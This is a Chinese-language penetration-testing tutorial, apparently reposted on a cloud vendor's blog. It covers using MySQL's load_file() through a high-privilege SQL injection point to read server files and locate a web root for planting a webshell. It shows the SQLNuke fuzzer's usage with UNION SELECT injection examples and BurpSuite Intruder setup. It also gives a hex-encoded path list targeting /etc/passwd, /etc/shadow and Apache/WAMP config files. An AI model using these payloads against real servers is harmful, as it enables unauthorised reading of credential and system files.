MySQL注入Load_File()函数应用

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: MySQL注入Load_File()函数应用

0x01 前言

相信很多人在渗透测试过程中都有遇到过这种情况:一个MySQL Root高权限注入点,也具备读取和写入权限,这时只需要找到网站绝对路径就可以写入Webshell了,但如果利用所有已知方法还是找不到网站绝对路径呢?这节我将给大家介绍一款注入辅助工具和BurpSuite利用方式


0x02 SQLNuke工具介绍

SQLNuke是一款用ruby编写的MySQL load_file Fuzzer工具,可以在找到网站高权限注入漏洞时辅助使用,它可以将目标系统中存在的文件下载到本地。


工具的原理也很简单,使用load_file函数配合路径字典来探测哪些文件可被读取并下载到本地磁盘。

    sql.rb                  //主程序
    config.yml              //配置文件
    lib/                    //基础库目录
    output/                 //输出目录
    inputs/packset.lst      //字典文件
    class/methods.rb        //类文件
      root@Jacks:~/sqlnuke-master# ./sql.rb -h
          -u, --url URL      Link with 'XxxX' ex: http://tar.com/?id=1+UNION+SELECT+1,XxxX,2--
          -d, --data DATA    POST DATA ex: id=-1+Union+Select+null,XxxX,null--&name=John
          -x, --hex                      Hex Conversion
              --proxy http://IP:PORT     HTTP Proxy
              --os (linux,win)           Target Server OS (linux,win)
              --agent AGENT              User-Agent for the header
              --ref REFERER              Referer for the header
              --cookie COOKIE            Cookie for the header
          -h, --help                     Information about commands


      0x03 利用BurpSuite测试

      我们可以把SQLNuke工具的字典文件拷贝到本地,然后自己添加一些Apache、phpMyAdmin或者其它常见敏感文件的绝对路径。


      SQLNuke在执行时会将字典里的路径自动转换成Hex编码,而BurpSuite不会自动转换Hex编码,所以得先把拷贝下来的字典文件的路径转换为Hex(十六进制),且得在Hex前加“0x”。注:BurpSuite中有一个Encode as ASCII hex选项可以进行编码!

      • BurpSuite->Intruder->Payloads->Payload Processing->Add->Encode(Encode as ASCII hex)
      0x2F6574632F706173737764
      0x2F6574632F736861646F77
      0x2F6574632F67726F7570
      0x2F6574632F686F737473
      0x2F6574632F617061636865322F6C6F67732F6163636573732E6C6F67
      0x2F6574632F68747470642F6163636573732E6C6F67
      0x2F6574632F696E69742E642F6170616368652F68747470642E636F6E66
      0x2F6574632F696E69742E642F617061636865322F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66
      0x2F686F6D652F6170616368652F68747470642E636F6E66
      0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66
      0x2F6F70742F6170616368652F636F6E662F68747470642E636F6E66
      0x2F6574632F68747470642F68747470642E636F6E66
      0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
      0x2F6574632F6170616368652F6170616368652E636F6E66
      0x2F6574632F6170616368652F68747470642E636F6E66
      0x2F6574632F617061636865322F617061636865322E636F6E66
      0x2F6574632F617061636865322F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
      0x433A5C626F6F742E696E69
      0x433a5c77616d705c62696e5c6170616368655c6c6f67735c6163636573732e6c6f67
      0x433a5c77616d705c62696e5c6d7973716c5c6d7973716c352e352e32345c77616d707365727665722e636f6e66
      0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c68747470642e636f6e66
      0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c77616d707365727665722e636f6e66
      0x433a5c70687053747564795c4170616368655c636f6e665c68747470642e636f6e66
      0x433a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c

      将上图中抓取到的SQL注入点数据包发送到Intruder模块,接着选择第2项Positions,点击“Clear$”清除默认参数然后选中数据包中“load_file(xxxx)”括号里的“xxxx”,点击“Add$”即可。

      这时切换到第3项Payloads加载我们事先准备好的字典,然后再切换到第4项Options设置下线程数都设置好了以后就可以点击BurpSuite菜单栏上的Intruder选项,点击Start Attack进行测试。

      等测试完后,可以根据返回数据包的Length(长度)大小进行排序这里会看到返回数据包的Length都不一样,因为返回的数据包里包含了不同的SQL注入语句,所以最终输出的Length也不一样。

      相关实践学习
      如何快速连接云数据库RDS MySQL
      本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
      全面了解阿里云能为你做什么
      阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
      相关文章
      |
      5月前
      |
      JSON 关系型数据库 MySQL
      Mysql(5)—函数
      MySQL提供了许多内置的函数以帮助用户进行数据操作和分析。这些函数可以分为几类,包括聚合函数、字符串函数、数值函数、日期和时间函数、控制流函数等。
      148 1
      Mysql(5)—函数
      |
      5月前
      |
      存储 关系型数据库 MySQL
      MySQL在企业内部应用场景有哪些
      【10月更文挑战第17天】MySQL在企业内部应用场景有哪些
      248 0
      |
      5月前
      |
      存储 关系型数据库 MySQL
      介绍一下MySQL的一些应用场景
      【10月更文挑战第17天】介绍一下MySQL的一些应用场景
      1114 0
      |
      2月前
      |
      SQL 关系型数据库 MySQL
      Mysql-常用函数及其用法总结
      以上列举了MySQL中一些常用的函数及其用法。这些函数在日常的数据库操作中非常实用,能够简化数据查询和处理过程,提高开发效率。掌握这些函数的使用方法,可以更高效地处理和分析数据。
      91 19
      |
      3月前
      |
      SQL 关系型数据库 MySQL
      【MySQL基础篇】盘点MySQL常用四大类函数
      本文介绍了MySQL中的四大类常用函数:字符串函数、数值函数、日期函数和流程函数。
      【MySQL基础篇】盘点MySQL常用四大类函数
      |
      3月前
      |
      SQL 关系型数据库 MySQL
      MySQL常见函数第二期,你都用过哪些呢 ?
      本期介绍了20个常用的MySQL函数,涵盖日期处理(如CURDATE()、DATE_FORMAT())、数学运算(如ABS()、ROUND())、统计分析(如COUNT()、SUM())等,帮助提高SQL查询效率和数据处理能力。希望对大家的学习有所帮助。
      102 7
      |
      3月前
      |
      关系型数据库 MySQL
      MySQL常见函数第一期,你都用过哪些呢 ?
      本期介绍10个常用的MySQL函数:字符串连接(CONCAT)、提取子字符串(SUBSTRING)、获取字符串长度(LENGTH)、转换大小写(UPPER、LOWER)、去除空格(TRIM)、替换字符串(REPLACE)、查找子字符串位置(INSTR)、带分隔符的字符串连接(CONCAT_WS)以及获取当前日期时间(NOW)。
      96 8
      |
      3月前
      |
      数据采集 关系型数据库 MySQL
      MySQL常用函数:IF、SUM等用法
      本文介绍了MySQL中常用的IF、SUM等函数及其用法,通过具体示例展示了如何利用这些函数进行条件判断、数值计算以及复杂查询。同时,文章还提到了CASE WHEN语句和其他常用函数,如COUNT、AVG、MAX/MIN等,强调了它们在数据统计分析、数据清洗和报表生成中的重要性。
      |
      3月前
      |
      关系型数据库 MySQL 数据处理
      【MySQL】函数
      MySQL 提供了丰富的函数集,涵盖字符串处理、数值运算、日期时间操作和聚合计算等多个方面。这些函数在日常数据库操作中极为重要,通过合理使用这些函数,可以大大提高数据处理和查询的效率。用户还可以通过自定义函数,扩展 MySQL 的功能以满足特定需求。
      123 3
      |
      4月前
      |
      关系型数据库 MySQL 数据处理
      MySQL函数与约束
      MySQL 提供了丰富的函数和强大的约束机制,用于数据处理和完整性维护。通过掌握这些工具,可以有效地管理和分析数据库中的数据,确保数据的一致性和准确性。无论是在日常数据查询中使用内置函数,还是在数据库设计中应用各种约束,都是确保数据库系统稳定、高效运行的关键。希望本文对您理解和应用 MySQL 函数与约束有所帮助。
      53 1